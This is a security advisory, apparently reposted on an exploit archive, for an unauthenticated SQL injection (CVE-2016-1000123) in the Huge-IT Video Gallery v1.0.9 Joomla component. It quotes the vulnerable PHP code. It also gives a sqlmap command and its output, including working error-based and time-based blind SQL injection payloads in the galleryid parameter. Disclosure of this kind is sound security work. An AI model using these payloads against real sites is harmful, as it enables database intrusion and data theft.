Title: Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9 for Joomla
Author: Larry W. Cashdollar, @_larry0
Date: 2016-09-15
Download Site: http://huge-it.com/joomla-video-gallery/
Vendor: www.huge-it.com, fixed v1.1.0
Vendor Notified: 2016-09-17
Vendor Contact: [email protected]
Description: A video slideshow gallery.
Vulnerability:
The following code does not prevent an unauthenticated user from injecting SQL into functions located in ajax_url.php.

Vulnerable Code in : ajax_url.php

11 define('_JEXEC',1);
12 defined('_JEXEC') or die('Restircted access');
.
.
.
28 if($ _POST['task']=="load_videos_content")
29
30 $ page = 1;
31
32
33 if(!empty($ _POST["page"]) && is_numeric($ _POST['page']) && $ _POST['page']>0){
34 $ paramssld='';
35 $ db5 = JFactory::getDBO();
36 $ query5 = $ db->getQuery(true);
37 $ query5->select('*');
38 $ query5->from('#__huge_it_videogallery_params');
39 $ db->setQuery($ query5);
40 $ options_params = $ db5->loadObjectList();
41 foreach ($ options_params as $ rowpar) {
42 $ key = $ rowpar->name;
43 $ value = $ rowpar->value;
44 $ paramssld[$ key] = $ value;
45
46 $ page = $ _POST["page"];
47 $ num=$ _POST['perpage'];
48 $ start = $ page * $ num - $ num;
49 $ idofgallery=$ _POST['galleryid'];
50
51 $ query = $ db->getQuery(true);
52 $ query->select('*');
53 $ query->from('#__huge_it_videogallery_videos');
54 $ query->where('videogallery_id ='.$ idofgallery);
55 $ query ->order('#__huge_it_videogallery_videos.ordering asc');
56 $ db->setQuery($ query,$ start,$ num);

CVE-2016-1000123
Exploit Code:
aC/ $ sqlmap -u 'http://example.com/components/com_videogallerylite/ajax_url.php' --data="page=1&galleryid=*&task=load_videos_content&perpage=20&linkbutton=2" --level=5 --risk=3
aC/ .
aC/ .
aC/ .
aC/ (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
aC/ sqlmap identified the following injection point(s) with a total of 2870 HTTP(s) requests:
aC/ ---
aC/ Parameter: #1* ((custom) POST)
aC/ Type: error-based
aC/ Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
aC/ Payload: page=1&galleryid=-3390 OR 1 GROUP BY CONCAT(0x716b766271,(SELECT (CASE WHEN (2575=2575) THEN 1 ELSE 0 END)),0x7170767071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&task=load_videos_content&perpage=20&linkbutton=2
aC/
aC/ Type: AND/OR time-based blind
aC/ Title: MySQL >= 5.0.12 time-based blind - Parameter replace
aC/ Payload: page=1&galleryid=(CASE WHEN (5952=5952) THEN SLEEP(5) ELSE 5952 END)&task=load_videos_content&perpage=20&linkbutton=2
aC/ ---
aC/ [19:36:55] [INFO] the back-end DBMS is MySQL
aC/ web server operating system: Linux Debian 8.0 (jessie)
aC/ web application technology: Apache 2.4.10
aC/ back-end DBMS: MySQL >= 5.0.12
aC/ [19:36:55] [WARNING] HTTP error codes detected during run:
aC/ 500 (Internal Server Error) - 2714 times
aC/ [19:36:55] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.4'
aC/
aC/ [*] shutting down at 19:36:55
Advisory: http://www.vapidlabs.com/advisory.php?v=169


Exploit Files ≈ Packet Storm

Leave a Reply

Your email address will not be published. Required fields are marked *